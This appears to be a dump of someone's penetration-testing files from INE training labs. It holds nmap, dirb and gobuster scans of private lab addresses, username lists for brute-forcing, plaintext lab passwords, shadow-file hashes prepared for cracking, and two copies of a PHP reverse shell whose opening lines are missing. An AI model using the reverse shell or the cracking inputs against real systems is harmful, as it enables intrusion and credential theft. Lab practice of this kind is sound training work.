| Key 256 5f:b9:93:e2:ec:eb:f7:08:e4:bb:82:d0:df:b9:b1:56 (ECDSA) used by:
|   172.16.64.101
|   172.16.64.182
| Key 2048 7f:b7:1c:3d:55:b3:9d:98:58:11:17:ef:cc:af:27:67 (RSA) used by:
|   172.16.64.101
|_  172.16.64.182
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 24 13:44:56 2021 -- 4 IP addresses (4 hosts up) scanned in 202.49 seconds

================================================
FILE: ine-labs/black-box2/alive_hosts.txt
================================================
172.16.64.81
172.16.64.91
172.16.64.92
172.16.64.166

================================================
FILE: ine-labs/black-box2/dot166_DONE/dirb_scan.txt
================================================
-----------------
DIRB v2.22
By The Dark Raver
-----------------

OUTPUT_FILE: dirb_scan.txt
START_TIME: Wed Feb 24 19:40:05 2021
URL_BASE: http://172.16.64.166:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://172.16.64.166:8080/ ----
==> DIRECTORY: http://172.16.64.166:8080/css/
==> DIRECTORY: http://172.16.64.166:8080/img/
+ http://172.16.64.166:8080/index.htm (CODE:200|SIZE:13098)
==> DIRECTORY: http://172.16.64.166:8080/js/
+ http://172.16.64.166:8080/server-status (CODE:403|SIZE:303)

---- Entering directory: http://172.16.64.166:8080/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.16.64.166:8080/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.16.64.166:8080/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Wed Feb 24 19:44:30 2021 DOWNLOADED: 4612 - FOUND: 2 ================================================ FILE: ine-labs/black-box2/dot166_DONE/for_hydra.txt ================================================ Admin Elizabeth Elizabeth.Lopez elizabeth elizabeth.lopez Tara Tara.Backer tara tara.baker Becky Becky.Casey becky becky.casey Randy Randy.Carlson randy randy.carlson Pablo Pablo.Roberts pablo pablo.roberts Bessie Bessie.Hammond bessie bessie.hammond Gerardo Gerardo.Malone gerardo gerardo.malone Sabrina Sabrina.Summers sabrina sabrina.summers ================================================ FILE: ine-labs/black-box2/dot166_DONE/names.txt ================================================ Elizabeth Lopez Tara Baker Becky Casey Randy Carlson Pablo Roberts Bessie Hammond Gerardo Malone Sabrina Summers ================================================ FILE: ine-labs/black-box2/dot81_DONE/dirb_scan.txt ================================================ ---------------- DIRB v2.22 By The Dark Raver ----------------- OUTPUT_FILE: dirb_scan.txt START_TIME: Wed Feb 24 18:54:17 2021 URL_BASE: http://172.16.64.81/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://172.16.64.81/ ---- ==> DIRECTORY: http://172.16.64.81/default/ + http://172.16.64.81/index.html (CODE:200|SIZE:11321) + http://172.16.64.81/server-status (CODE:403|SIZE:300) ==> DIRECTORY: http://172.16.64.81/webapp/ ---- Entering directory: http://172.16.64.81/default/ ---- + http://172.16.64.81/default/index.html (CODE:200|SIZE:11321) ---- Entering directory: http://172.16.64.81/webapp/ ---- ==> DIRECTORY: http://172.16.64.81/webapp/assets/ ==> DIRECTORY: http://172.16.64.81/webapp/css/ ==> DIRECTORY: http://172.16.64.81/webapp/emails/ + http://172.16.64.81/webapp/favicon.ico (CODE:200|SIZE:300757) ==> DIRECTORY: http://172.16.64.81/webapp/img/ ==> DIRECTORY: 
http://172.16.64.81/webapp/includes/ + http://172.16.64.81/webapp/index.php (CODE:200|SIZE:6359) ==> DIRECTORY: http://172.16.64.81/webapp/install/ ==> DIRECTORY: http://172.16.64.81/webapp/lang/ + http://172.16.64.81/webapp/robots.txt (CODE:200|SIZE:206) ==> DIRECTORY: http://172.16.64.81/webapp/templates/ ==> DIRECTORY: http://172.16.64.81/webapp/upload/ ---- Entering directory: http://172.16.64.81/webapp/assets/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.81/webapp/css/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.81/webapp/emails/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.81/webapp/img/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.81/webapp/includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.81/webapp/install/ ---- + http://172.16.64.81/webapp/install/index.php (CODE:200|SIZE:3018) ---- Entering directory: http://172.16.64.81/webapp/lang/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.81/webapp/templates/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.81/webapp/upload/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. 
(Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Wed Feb 24 19:16:07 2021 DOWNLOADED: 18448 - FOUND: 7 ================================================ FILE: ine-labs/black-box2/dot81_DONE/users.bak ================================================ john1:password123 peter:youdonotguessthatone5 ================================================ FILE: ine-labs/black-box2/dot91/dirb_scan.txt ================================================ ----------------- DIRB v2.22 By The Dark Raver ----------------- OUTPUT_FILE: dirb_scan.txt START_TIME: Thu Feb 25 18:26:50 2021 URL_BASE: http://172.16.64.91:80/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://172.16.64.91:80/ ---- + http://172.16.64.91:80/index.html (CODE:200|SIZE:11321) + http://172.16.64.91:80/server-status (CODE:403|SIZE:300) ----------------- END_TIME: Thu Feb 25 18:38:30 2021 DOWNLOADED: 4612 - FOUND: 2 ================================================ FILE: ine-labs/black-box2/dot91/gobuster_foocorp_scan.txt ================================================ ===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://75ajvxi36vchsv584es1.foocorp.io/ [+] Threads : 10 [+] Wordlist : /usr/share/wordlists/dirb/common.txt [+] Status codes : 200,204,301,302,307,403 [+] Timeout : 10s ===================================================== ===================================================== /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /app (Status: 301) /index.html (Status: 200) /server-status (Status: 403) ===================================================== ===================================================== ================================================ FILE: ine-labs/black-box2/dot91/gobuster_foocorp_scan2.txt ================================================ 
===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://75ajvxi36vchsv584es1.foocorp.io/app/ [+] Threads : 10 [+] Wordlist : /usr/share/wordlists/dirb/common.txt [+] Status codes : 200,204,301,302,307,403 [+] Timeout : 10s ===================================================== ===================================================== /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /index.php (Status: 200) /js (Status: 301) /upload (Status: 301) ===================================================== ===================================================== ================================================ FILE: ine-labs/black-box2/dot91/gobuster_scan.txt ================================================ ===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://172.16.64.91/ [+] Threads : 10 [+] Wordlist : /usr/share/wordlists/dirb/common.txt [+] Status codes : 200,204,301,302,307,403 [+] Timeout : 10s ===================================================== ===================================================== /.hta (Status: 403) /.htpasswd (Status: 403) /.htaccess (Status: 403) /index.html (Status: 200) /server-status (Status: 403) ===================================================== ===================================================== ================================================ FILE: ine-labs/black-box2/dot91/myapp.html ================================================



Select file to upload:



© FooCORP 2021
================================================ FILE: ine-labs/black-box2/dot91/php-reverse-shell.php ================================================ array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won't stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { // Check for end of TCP connection if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } // Check for end of STDOUT if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } // Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to process's STDIN if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } // If we can read from the process's STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } // If we can read from the process's STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, 
$input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); // Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) function printit ($string) { if (!$daemon) { print "$string\n"; } } ?> ================================================ FILE: ine-labs/black-box2/dot92_DONE/dirb_scan.txt ================================================ ----------------- DIRB v2.22 By The Dark Raver ----------------- OUTPUT_FILE: dirb_scan.txt START_TIME: Wed Feb 24 19:21:07 2021 URL_BASE: http://172.16.64.92/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://172.16.64.92/ ---- ==> DIRECTORY: http://172.16.64.92/assets/ ==> DIRECTORY: http://172.16.64.92/images/ + http://172.16.64.92/index.html (CODE:200|SIZE:1393) + http://172.16.64.92/server-status (CODE:403|SIZE:300) ---- Entering directory: http://172.16.64.92/assets/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.92/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Wed Feb 24 19:26:00 2021 DOWNLOADED: 4612 - FOUND: 2 ================================================ FILE: ine-labs/black-box2/dot92_DONE/user-hashes.txt ================================================ c5d71f305bb017a66c5fa7fd66535b84 14d69ee186f8d9bbeddd4da31559ce0f ================================================ FILE: ine-labs/black-box2/thorough_nmap_scan.txt ================================================ # Nmap 7.91 scan initiated Wed Feb 24 18:44:11 2021 as: nmap -sV -n -T4 -Pn -p- -A -iL alive_hosts.txt -v --open -oN thorough_nmap_scan.txt Nmap scan report for 172.16.64.81 Host is up (0.055s latency). 
Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 09:1e:bf:d0:44:0f:bc:c8:64:bd:ac:16:09:79:ca:a8 (RSA) | 256 df:60:fc:fc:db:4b:be:b6:3e:7a:4e:84:4c:a1:57:7d (ECDSA) |_ 256 ce:8c:fe:bd:76:77:8e:bd:c9:b8:8e:dc:66:b8:80:38 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 13306/tcp open mysql MySQL 5.7.25-0ubuntu0.16.04.2 | mysql-info: | Protocol: 10 | Version: 5.7.25-0ubuntu0.16.04.2 | Thread ID: 7 | Capabilities flags: 63487 | Some Capabilities: ODBCClient, Support41Auth, SupportsLoadDataLocal, FoundRows, ConnectWithDatabase, LongPassword, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, Speaks41ProtocolOld, SupportsCompression, DontAllowDatabaseTableColumn, InteractiveClient, Speaks41ProtocolNew, LongColumnFlag, SupportsTransactions, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins | Status: Autocommit | Salt: +Y#V@\x1D4xj/2<\x17\x0D\x16\x02TEN0 |_ Auth Plugin Name: mysql_native_password MAC Address: 00:50:56:A0:8B:2B (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 
Uptime guess: 0.003 days (since Wed Feb 24 18:42:27 2021) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=258 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 54.73 ms 172.16.64.81 Nmap scan report for 172.16.64.91 Host is up (0.056s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 6379/tcp open redis Redis key-value store MAC Address: 00:50:56:A0:8B:74 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 
Uptime guess: 0.005 days (since Wed Feb 24 18:38:19 2021) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=259 (Good luck!) IP ID Sequence Generation: All zeros TRACEROUTE HOP RTT ADDRESS 1 55.56 ms 172.16.64.91 Nmap scan report for 172.16.64.92 Host is up (0.056s latency). 
Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f4:86:09:b3:d6:d1:ba:d0:28:65:33:b7:82:f7:a6:34 (RSA) | 256 3b:d7:39:c3:4f:c4:71:a2:16:91:d1:8f:ac:04:a8:16 (ECDSA) |_ 256 4f:43:ac:70:09:a6:36:c6:f5:b2:28:b8:b5:53:07:4c (ED25519) 53/tcp open domain dnsmasq 2.75 | dns-nsid: |_ bind.version: dnsmasq-2.75 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Photon by HTML5 UP 63306/tcp open mysql MySQL 5.7.25-0ubuntu0.16.04.2 | mysql-info: | Protocol: 10 | Version: 5.7.25-0ubuntu0.16.04.2 | Thread ID: 7 | Capabilities flags: 63487 | Some Capabilities: ODBCClient, Support41Auth, SupportsLoadDataLocal, FoundRows, ConnectWithDatabase, LongPassword, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, Speaks41ProtocolOld, SupportsCompression, DontAllowDatabaseTableColumn, InteractiveClient, Speaks41ProtocolNew, LongColumnFlag, SupportsTransactions, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins | Status: Autocommit | Salt: g\x04\x1A6\x0FqO\x0D\x18uo[d:I"z/\x10\x11 |_ Auth Plugin Name: mysql_native_password MAC Address: 00:50:56:A0:0B:82 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 
Uptime guess: 0.007 days (since Wed Feb 24 18:36:09 2021) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=260 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 55.71 ms 172.16.64.92 Nmap scan report for 172.16.64.166 Host is up (0.056s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a6:1e:f8:c6:eb:32:0a:f6:29:c8:de:86:b7:4c:a0:d7 (RSA) | 256 b9:94:56:c7:4d:63:ad:bd:2d:5e:26:43:75:78:07:6f (ECDSA) |_ 256 d6:82:45:0a:51:4e:01:2d:6a:be:fa:cf:75:de:46:a0 (ED25519) 8080/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Ucorpora Demo MAC Address: 00:50:56:A0:B1:E8 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 
Uptime guess: 0.004 days (since Wed Feb 24 18:40:21 2021) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=258 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 56.01 ms 172.16.64.166 Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
# Nmap done at Wed Feb 24 18:46:12 2021 -- 4 IP addresses (4 hosts up) scanned in 122.68 seconds ================================================ FILE: ine-labs/black-box3/alive_hosts.txt ================================================ 172.16.37.1 172.16.37.220 172.16.37.234 ================================================ FILE: ine-labs/black-box3/dot220/gobuster_scan.txt ================================================ ===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://172.16.37.220/ [+] Threads : 10 [+] Wordlist : /usr/share/wordlists/dirb/common.txt [+] Status codes : 200,204,301,302,307,403 [+] Timeout : 10s ===================================================== ===================================================== /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /index.php (Status: 200) /javascript (Status: 301) /server-status (Status: 403) ===================================================== ===================================================== ================================================ FILE: ine-labs/black-box3/dot234/for_john.txt ================================================ elsuser:$6$MGsPjrt7$hBUzryEWeYdgKvj4MO0v7y0JJ6TxH1oXw4vHCXzG5kZOv8i4ejvbXUM3jkBuymRet9jfQ53hU806p8ujcuuQr1:17515:0:99999:7::: test:$6$kDmCF0O1$i7.RLl8NmxNCgB2jCGHgmGYV0TcVoaAeTuseohJ5Z71okk/J1N4owqfpuHjmfqAHSxx2MAPezfc8OHy.SRodM1:17983:0:99999:7::: ================================================ FILE: ine-labs/black-box3/dot234/gobuster_scan.txt ================================================ /.htaccess (Status: 403) /.hta (Status: 403) /.htpasswd (Status: 403) /index.html (Status: 200) /server-status (Status: 403) /xyz (Status: 301) ================================================ FILE: ine-labs/black-box3/dot234/index.php ================================================ "; echo "
"; system("ifconfig"); ?> ================================================ FILE: ine-labs/black-box3/dot234/revshell.php ================================================ array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won't stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { // Check for end of TCP connection if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } // Check for end of STDOUT if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } // Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to process's STDIN if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } // If we can read from the process's STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } // If we can read from the process's STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: 
$input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); // Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) function printit ($string) { if (!$daemon) { print "$string\n"; } } ?> ================================================ FILE: ine-labs/black-box3/dot234/scan_xyz.txt ================================================ /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /index.php (Status: 200) ================================================ FILE: ine-labs/black-box3/thorough_nmap_scan.txt ================================================ # Nmap 7.91 scan initiated Thu Feb 25 20:05:44 2021 as: nmap -sV -n -T4 -Pn -p- -A -iL alive_hosts.txt -v --open -oN thorough_nmap_scan.txt Nmap scan report for 172.16.37.220 Host is up (0.057s latency). Not shown: 59238 closed ports, 6295 filtered ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 3307/tcp open tcpwrapped No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 
Uptime guess: 0.002 days (since Thu Feb 25 20:05:06 2021) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=257 (Good luck!) IP ID Sequence Generation: All zeros TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 61.21 ms 10.13.37.1 2 57.49 ms 172.16.37.220 Nmap scan report for 172.16.37.234 Host is up (0.061s latency). Not shown: 57710 closed ports, 7823 filtered ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 40121/tcp open ftp ProFTPD 1.3.0a 40180/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 
Uptime guess: 0.002 days (since Thu Feb 25 20:05:06 2021) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=255 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Unix TRACEROUTE (using port 40121/tcp) HOP RTT ADDRESS - Hop 1 is the same as for 172.16.37.220 2 58.71 ms 172.16.37.234 Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
# Nmap done at Thu Feb 25 20:07:46 2021 -- 3 IP addresses (3 hosts up) scanned in 122.12 seconds ================================================ FILE: ine-labs/bruteforce-and-password-cracking/alive_hosts.txt ================================================ 192.168.99.22 192.168.99.100 ================================================ FILE: ine-labs/bruteforce-and-password-cracking/for_john.txt ================================================
rob:$6$KynzgNNI$CRqz5ZCoxyw8Iz3Y4DavYHefo8e3CdPxaJAKmA8G7fVioFb3imRVsOQO9fvR94aOSywrCHx8JRZ8rox4jqVCk.:1043:1043::/home/rob:/bin/sh stefan:$6$5UNbMPFr$S9zKaPdjN3WF5XdvcBZrc1RV.bk/ufmZgiNAr8OsnKtZCPqFRtQ.g2ewAbQ40ARubCMQD0fIdQSL3LB4JBBuK1:1044:1044::/home/stefan:/bin/sh sam:$6$4IQ98NuP$Q7Kd1uQhbVl4rv9yPzn51rA8U1stcC9zCUu/o83v959HNcMXdEyZ39Ec8/cTq89v/fes.lwpozekSK16JHLr3/:1045:1045::/home/sam:/bin/sh linux-kernel:$6$iZd1ERbp$wO5U7YmvpfM8vuJX2er3jI7JPUTv7ahoypgc2n1/CWQr9yyf7CyFcxUBj9T2tEx7KR9x3Z6/C5Q3wxumJKMuu/:1046:1046::/home/linux-kernel:/bin/sh jonathan:$6$JN51qUeO$YRkPN8gR43gmtTEg0uycZaz3SOOwT37g17tt8bB/Fi/Xr/dKPsUhaWfOjZ1uNrJg7sL4z9srGe.zWP0B1tfQc/:1047:1047::/home/jonathan:/bin/sh erik:$6$Ib9a2n66$vfEKmQ0LO/sV3M4PsanGWx3ATuHNFZ/FysOYhKAdG4PdXeXiLackGxLuNs7qG4KOAVVhyLAM.99pP4j8sJ3Vr1:1048:1048::/home/erik:/bin/sh orion:$6$EnZP3LwQ$pDR2Jny9KIPDEmoB.jzhp38Ik5FyG4DWzewHoEePxdCBzFfBWnIUQNXDNup8U2IoAiUC/jaO/i9SpStI8ZgIa1:1049:1049::/home/orion:/bin/sh doug:$6$kV2vj2S6$eKQyp76DlZbo/tgLKyjtLQf.G86BY9oVkfscbIrWwCYRqd.zJnLIOJPrGJJSvK59O.OpUc5L8vo.1yet/IndA.:1050:1050::/home/doug:/bin/sh spam:$6$b4.yukui$byGJM8hTw11KmLes6YSfvo7IKfkg5HYtll.JOVFJgM9IObO6NE7dpLhTiHxgLLCPtXa0wbwxPAlYTtPsrCnLP.:1051:1051::/home/spam:/bin/sh nessus:$6$5b.qaMaF$MSnDGsA6Yo7LzABXWXtdHb5HruaehdkrLbdv9Yg.lQoG9nC6patjwPqFuR1G2CSslqIZkBbZst7rhCeJXr3Z.0:1052:1052::/home/nessus:/bin/sh bugs:$6$cJfe9yB0$DkgkyIHYGOFQ9hIF6A28Da0niQBq6Yn9PXjNKAJEK7y0sdEc6v9KSpW8DEBXg.lO/MCgpHuuAbbcAQfYs36gG/:1053:1053::/home/bugs:/bin/sh rick:$6$SFXj7ADA$qu3mlQDjIwVNzC.3JkUKUS2Hp7aeC1Zg5GP1h7nM5BmCTsJ7d1ckSF3ErjPbpZFIqNCz6NAgy1F76PmjeJz.x0:1054:1054::/home/rick:/bin/sh josh:$6$KU1UUsAZ$ac7T8xBfcLxXmb/qRNuEKrfZy1G/kcqsJzWJ93/qTa08itf31x5/pcdVHj30MKXYh/poaN8fOlKkZR0f2xrr3.:1055:1055::/home/josh:/bin/sh research:$6$m0nQbAaZ$FKL3XBWkT3GEv0UVn6WTHssjyjou2/33f8BKE4voI7HWU9FdF1hABlyQAqAYhJOfRuQpuZzSBcJVvCMtMX6D51:1056:1056::/home/research:/bin/sh 
craig:$6$movXAzDc$E4sBocqFLzY9iif37.1VF4uuOr5QsI7ZwrnkTM.ITDebTuEc5od/87suR9fBPGuEm4HU4pUf324z3Pxb86Sk9/:1057:1057::/home/craig:/bin/sh sven:$6$L2Ac90qT$4NWVht13koXx1Zewnoq.aqh7584NpDNToIa41Qqbc94hwitYtA5pXZF0ZwsKRUIQ4bf0Z.5Tm9Ue5BLbw1y/61:1058:1058::/home/sven:/bin/sh gary:$6$mbC5nX5S$baJcUKoownjBSnz6/wuXNK75gvtKZ5dub4BZwpjP1YvgkjooQ8GRbZpR4fAo0zevFiGWONgHjDkLKYxDiYIST/:1059:1059::/home/gary:/bin/sh brett:$6$qd2dCjHj$6qWUTOIG5OmP5OcN3.cMfDr24ScByDakPNIrRZjZqcqaiHlBuFbGvDsGTIAPizkZGrIvuH7gnhAgt/hg3f9Gz/:1060:1060::/home/brett:/bin/sh Security:$6$GPayTWXW$sSarI38ETnIzRUSXgEXambmN8FNcCuUiDqnMYeeKYzavwk0Pefw5VafzCG9jpgTnzaWrY1QlbpkNOy4c22yRu.:1061:1061::/home/Security:/bin/sh torvalds:$6$UdO6LNso$sIErGAh.8NWiPZyarP4EqM15zKLy8ZDT4C1HixADAOHJ8MojNHFAJa33jx9qpixPiUpgibhKJpKb4gY/YgjSx1:1062:1062::/home/torvalds:/bin/sh nate:$6$cic0vUV.$/zZv9r8/5C8D7HkGlymqTr1t248kTvSScQfyxnYldFQPQplIbfrn2R61ZHu.t0ImjP38YyMzw1Wbftpg8p9Xf0:1063:1063::/home/nate:/bin/sh larry:$6$C1wU6KtA$XgPBkqQLm6j2QdkDfLNyyQC90Fck6.EKAKxwD0DVeHm2m8k3.r4yLB0.lqa741PXTOYpq.gZPt83GsQszfK0G1:1064:1064::/home/larry:/bin/sh adrian:$6$.wQ4ogUx$xRH9xkYVsVAKswluFPaNZj0c/CxVyzpdBkQaZ1rpSU8IEzub91YTwTDrEJUvWnCL9K.Sfm81/lQhLY1VpbX8g1:1065:1065::/home/adrian:/bin/sh test:$6$IKTyMZxA$C6g0kSQ7eWmmRQrB7jlFMvS4oPU48tE18sJKuPxX0QSl9QlOXwwY3U.2aTpalC3i6qcPbLSbjav0SjmlxplNp0:1066:1066::/home/test:/bin/sh tech:$6$OTt3okCG$lrKSF4KyxVZgWlJ3uGgBRmMkChdZ8hxHyPWXS2/a2Vlq129Zq3jCZVINrW9nRG20TNsqI0MN07e88jJTGVGjd1:1067:1067::/home/tech:/bin/sh someone:$6$Zk8ylIKZ$rFllR3qlbmirrkgwRppG0HaV9ppHK0/jHWTVeqsX3oxFKjnzgg.DnS7CMXas151xCk51CmUV4dmeL17cJ3nIZ0:1068:1068::/home/someone:/bin/sh kris:$6$MIsyuc0b$PcN7IMMSL7Fjla0C7IayevAuLD6iQmkvGX2rIxcx0VAGr7LACwtchRrE3AcZO5yTr3MQlZac9q2tvJcQjAUiF0:1069:1069::/home/kris:/bin/sh 